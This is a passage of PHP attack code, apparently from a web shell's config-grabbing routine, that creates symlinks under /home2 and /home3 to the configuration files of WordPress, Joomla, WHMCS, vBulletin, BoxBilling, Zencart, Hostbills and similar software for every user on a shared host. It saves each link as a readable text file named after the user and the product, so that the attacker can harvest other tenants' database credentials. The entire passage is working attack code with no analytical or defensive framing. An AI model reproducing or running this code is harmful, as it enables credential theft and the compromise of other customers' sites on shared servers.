1661. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1662. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1663. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1664. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1665. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1666. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1667. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1668. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1669. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1670. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1671. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1672. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1673. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1674. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1675. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1676. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1677. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1678. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1679. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1680. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1681. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1682. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1683. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1684. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1685. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1686. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1687. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1688. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1689. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1690. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1691. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1692. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1693. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1694. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1695. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1696. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1697. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1698. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1699. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1700. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1701. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1702. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1703. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1704. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1705. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1706. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1707. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1708. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1709. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1710. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1711. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1712. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1713. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1714. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1715. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1716. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1717. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1718. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1719. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1720. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1721. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1722. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1723. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1724. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1725. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1726. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1727. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1728. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1729. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1730. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1731. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1732. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1733. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1734. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1735. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1736. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1737. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1738. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1739. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1740. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1741. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1742. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1743. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1744. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1745. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1746. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1747. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1748. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1749. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1750. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1751. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1752. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1753. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1754. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1755. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1756. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1757. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1758. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1759. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1760. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1761. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1762. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1763. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1764. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1765. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1766. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1767. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1768. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1769. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1770. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1771. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1772. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1773. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1774. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1775. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1776. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1777. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1778. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1779. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1780. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1781. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1782. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1783. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1784. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1785. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1786. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1787. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1788. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1789. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1790. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1791. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1792. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1793. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1794. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1795. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1796. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1797.  
1798. //Home3
1799.  
1800. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1801. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1802. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1803. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1804. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1805. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1806. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1807. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1808. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1809. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1810. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1811. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1812. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1813. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1814. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1815. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1816. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1817. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1818. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1819. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1820. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1821. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1822. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1823. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1824. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1825. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1826. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1827. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1828. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1829. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1830. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1831. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1832. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1833. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1834. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1835. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1836. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1837. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1838. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1839. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1840. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1841. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1842. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1843. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1844. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1845. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1846. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1847. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1848. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1849. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1850. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1851. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1852. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1853. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1854. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1855. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1856. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1857. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1858. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1859. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1860. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1861. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1862. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1863. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1864. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1865. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1866. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1867. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1868. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1869. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1870. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1871. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1872. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1873. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1874. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1875. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1876. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1877. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1878. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1879. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1880. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1881. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1882. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1883. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1884. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1885. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1886. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1887. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1888. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1889. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1890. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1891. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1892. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1893. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1894. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1895. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1896. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1897. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1898. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1899. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1900. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1901. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1902. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1903. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1904. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1905. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1906. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1907. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1908. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1909. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1910. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1911. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1912. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1913. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1914. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1915. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1916. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1917. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1918. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1919. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1920. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1921. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1922. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1923. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1924. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1925. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1926. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1927. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1928. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1929. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1930. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1931. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1932. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1933. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1934. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1935. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1936. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1937. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1938. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1939. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1940. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1941. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1942. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1943. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1944. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1945. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1946. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1947. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1948. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1949. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1950. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1951. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1952. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1953. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1954. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1955. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1956. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1957. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1958. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1959. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1960. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1961. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1962. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1963. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1964. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1965. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1966. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1967. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1968. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1969. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1970. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1971. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
